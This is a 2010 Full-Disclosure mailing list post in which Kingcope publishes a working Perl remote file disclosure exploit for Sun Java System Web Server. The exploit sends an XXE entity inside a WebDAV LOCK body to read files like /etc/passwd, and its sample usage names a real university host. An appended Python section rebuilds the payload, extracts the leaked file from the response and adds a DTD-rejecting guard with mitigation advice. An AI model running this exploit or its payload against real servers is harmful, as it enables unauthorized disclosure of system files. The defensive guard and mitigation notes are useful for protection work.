www.isowarez.de - you have no idea what we're able to r0xx000Or

2010/4/3 Christian Sciberras <[email protected]>:
> "Sun D3VS SM0KiNG PoT AGAiN"
> "SuPP0RT iF YOU#RE kRAD KTHX"
>
> What the fuck is wrong with you guys?
> Ever given the psychiatrist a visit?
>
>
> On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <[email protected]> wrote:
>>
>> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
>> KTHX
>>
>> #!/usr/bin/perl
>> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
>> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
>> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
>> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
>> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
>> # MAY/2010
>> # VERY THANKS TO LSD
>> #
>> #
>> # oO VERiFIED oN Oo
>> #
>> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS SERVER 2008 & SunOS 5.10]
>> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
>> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
>> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>>
>> use strict;
>> use warnings;
>> use IO::Socket;
>> use MIME::Base64;   # not used below; handy if you add Basic auth
>>
>> print "//Sun Microsystems Sun Java System Web Server\n";
>> print "//Remote File Disclosure Exploit\n";
>> print "//by Kingcope\n";
>> print "May/2010\n";
>>
>> if ($#ARGV != 2) {
>>     print "usage: perl sunone.pl <target> <webdav directory> <file to get>\n";
>>     print "sample: perl sunone.pl lib7.berkeley.edu /dav /etc/passwd\n";
>>     exit;
>> }
>>
>> my $target     = $ARGV[0];
>> my $folder     = $ARGV[1];
>> my $remotefile = $ARGV[2];
>>
>> $folder =~ s{^/+}{};   # the request line below adds its own leading slash
>>
>> $| = 1;
>>
>> # LOCK body carrying an external entity that points at the target file.
>> # The server expands &RemoteX; while parsing the lockinfo and echoes the
>> # owner element back in the lockdiscovery response, file contents included.
>> my $KRADXmL =
>>   "<?xml version=\"1.0\"?>\n"
>>   ."<!DOCTYPE REMOTE [\n"
>>   ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
>>   ."]>\n"
>>   ."<D:lockinfo xmlns:D='DAV:'>\n"
>>   ."<D:lockscope><D:exclusive/></D:lockscope>\n"
>>   ."<D:locktype><D:write/></D:locktype>\n"
>>   ."<D:owner>\n"
>>   ."<D:href>\n"
>>   ."<REMOTE>\n"
>>   ."<RemoteX>&RemoteX;</RemoteX>\n"
>>   ."</REMOTE>\n"
>>   ."</D:href>\n"
>>   ."</D:owner>\n"
>>   ."</D:lockinfo>\n";
>>
>> my $sock = IO::Socket::INET->new(PeerAddr => $target,
>>                                  PeerPort => '80',
>>                                  Proto    => 'tcp')
>>     or die "connect to $target:80 failed: $!\n";
>>
>> print $sock "LOCK /$folder HTTP/1.1\r\n".
>>             "Host: $target\r\n".
>>             "Depth: 0\r\n".
>>             "Connection: close\r\n".
>>             "Content-Type: application/xml\r\n".
>>             "Content-Length: ".length($KRADXmL)."\r\n\r\n".
>>             $KRADXmL;
>>
>> # Print the whole response (the disclosed file is inside it) and pick up
>> # the lock token so the lock can be released again afterwards.
>> my $locktoken = "";
>> while (<$sock>) {
>>     if (/^Lock-Token:\s*(\S+)/i) {
>>         $locktoken = $1;
>>     }
>>     print;
>> }
>> close($sock);
>>
>> $sock = IO::Socket::INET->new(PeerAddr => $target,
>>                               PeerPort => '80',
>>                               Proto    => 'tcp')
>>     or die "connect to $target:80 failed: $!\n";
>>
>> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
>>             "Host: $target\r\n".
>>             "Connection: close\r\n".
>>             "Lock-Token: $locktoken\r\n\r\n";
>>
>> while (<$sock>) {
>>     print;
>> }
>> close($sock);
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
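Added here as a worked example, not code from Kingcope's post or from Sun: the same lockinfo XXE body rebuilt in Python, the pre-parse guard a DAV server can apply (reject any body that declares a DTD, since no RFC 4918 request body needs one), and extraction of the disclosed file from the echoed owner element, which is what the Perl script's `print;` loop dumps to the terminal. The LOCK response and the benign lockinfo body below are constructed to the RFC 4918 lockdiscovery shape; they are not captured Sun Java System Web Server traffic, the passwd lines and token are made up, and the guard is a generic mitigation, not Sun's fix.

```python
"""XXE via WebDAV LOCK: payload shape, a server-side guard, and extraction
of the disclosed file from the echoed <D:owner>. Added example, not part of
the original post; all sample data in this file is constructed."""
import re
import xml.etree.ElementTree as ET

DAV = "DAV:"
# A DTD in a WebDAV request body is never legitimate, and <!ENTITY ... SYSTEM>
# is exactly what turns the XML parser into a file reader.
_DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b")


def build_lock_body(remote_file: str) -> str:
    """Same lockinfo body the Perl exploit sends: an external entity whose
    replacement text is the target file, referenced inside <D:owner>/<D:href>.
    A server that expands it echoes the file back in the LOCK response."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE REMOTE [\n"
        f'<!ENTITY RemoteX SYSTEM "{remote_file}">\n'
        "]>\n"
        "<D:lockinfo xmlns:D='DAV:'>\n"
        "<D:lockscope><D:exclusive/></D:lockscope>\n"
        "<D:locktype><D:write/></D:locktype>\n"
        "<D:owner><D:href><REMOTE><RemoteX>&RemoteX;</RemoteX></REMOTE></D:href></D:owner>\n"
        "</D:lockinfo>\n"
    )


def is_xxe_attempt(body: str) -> bool:
    """Pre-parse guard: True if the (decoded) body declares a DTD or entity."""
    return _DTD_RE.search(body) is not None


def parse_lockinfo(body: str) -> dict:
    """Server side: refuse DTDs before the parser sees them, then read only
    the fields a LOCK needs. Returns lock scope, lock type and owner href."""
    if is_xxe_attempt(body):
        raise ValueError("DTD or entity declaration in LOCK body; rejected")
    root = ET.fromstring(body)
    if root.tag != f"{{{DAV}}}lockinfo":
        raise ValueError("not a DAV:lockinfo body")

    def local(el):  # strip the {DAV:} namespace from a tag
        return el.tag.split("}", 1)[-1] if el is not None else None

    href = root.find(f"{{{DAV}}}owner/{{{DAV}}}href")
    return {
        "scope": local(root.find(f"{{{DAV}}}lockscope/*")),
        "type": local(root.find(f"{{{DAV}}}locktype/*")),
        "owner_href": (href.text or "").strip() if href is not None else "",
    }


def split_http_response(raw: str):
    """Split a raw HTTP/1.1 response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def lock_token(raw_response: str) -> str:
    """Case-insensitive version of the Perl script's Lock-Token scrape, so the
    follow-up UNLOCK can release the lock the exploit leaves behind."""
    return split_http_response(raw_response)[1].get("lock-token", "")


def extract_disclosed_file(raw_response: str, entity_element: str = "RemoteX") -> str:
    """Pull the expanded entity text out of the echoed owner element; '' if absent."""
    body = split_http_response(raw_response)[2]
    if not body.strip():
        return ""
    root = ET.fromstring(body)
    for el in root.iter(entity_element):
        return el.text or ""
    return ""


# Constructed sample: a vulnerable server's LOCK response with the entity expanded
# into the owner href (shape per RFC 4918 lockdiscovery; content and token made up).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Lock-Token: <opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>\r\n"
    "Content-Type: text/xml; charset=UTF-8\r\n"
    "Connection: close\r\n"
    "\r\n"
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<D:prop xmlns:D="DAV:"><D:lockdiscovery><D:activelock>\n'
    "<D:locktype><D:write/></D:locktype>\n"
    "<D:lockscope><D:exclusive/></D:lockscope>\n"
    "<D:depth>0</D:depth>\n"
    "<D:owner><D:href><REMOTE><RemoteX>root:x:0:0:Super-User:/:/sbin/sh\n"
    "webservd:x:80:80:WebServer Reserved UID:/:\n"
    "</RemoteX></REMOTE></D:href></D:owner>\n"
    "<D:timeout>Second-604800</D:timeout>\n"
    "<D:locktoken><D:href>opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4</D:href></D:locktoken>\n"
    "</D:activelock></D:lockdiscovery></D:prop>\n"
)

# Constructed sample: an ordinary lockinfo body that the guard must let through.
BENIGN_LOCK_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<D:lockinfo xmlns:D="DAV:">\n'
    "<D:lockscope><D:exclusive/></D:lockscope>\n"
    "<D:locktype><D:write/></D:locktype>\n"
    "<D:owner><D:href>http://example.org/~ejw/contact.html</D:href></D:owner>\n"
    "</D:lockinfo>\n"
)

if __name__ == "__main__":
    print(build_lock_body("/etc/passwd"))
    print(parse_lockinfo(BENIGN_LOCK_BODY))
    print("token:", lock_token(SAMPLE_RESPONSE))
    print(extract_disclosed_file(SAMPLE_RESPONSE))
```

Run the guard on the body after decoding it according to the request's Content-Type charset, otherwise a UTF-16 body slips past the regex. Pattern-matching is a stopgap for a server you cannot change; the durable fix is to configure the XML parser used for DAV bodies to disallow DTDs and external entity resolution altogether.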
